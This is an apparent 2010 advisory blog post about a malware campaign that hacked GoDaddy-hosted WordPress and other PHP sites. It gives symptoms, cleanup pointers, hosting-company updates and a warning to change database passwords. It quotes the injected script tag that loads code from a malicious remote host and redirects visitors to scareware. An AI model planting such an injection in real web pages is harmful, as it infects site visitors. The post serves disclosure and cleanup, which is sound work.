WordPress sites self-hosted on GoDaddy.com are reporting being maliciously hacked today with <script src="http://holasionweb.com/oo.php"></script>!
Warning: This is dangerous malware! Anyone visiting an infected website can get their computers infected, if they do not have a up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click "yes" or "okay" to download.
If your website is infected, put it down for maintenance immediately. There are instructions on how to do so at this post.
We have also received reports that this not only affected WordPress installations, but Joomla and other php-based platforms.
Here's the holasionweb symptoms:
- Infected sites get redirected to a fake AV (scareware).
- Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
- Redirects to a blank page at www.1.realsafe-23.net/?......
- Source code reveals <script src="http://holasionweb.com/oo.php"> in the the header section </head> of the infected pages.
How to fix your hacked WordPress site on GoDaddy.com
- We have written up instructions on how to remove malware and restore your WordPress site here.
- David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.
We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.
UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.
UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.
We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.
In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?
- Noah Plumb
Go Daddy Communications
UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.
VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.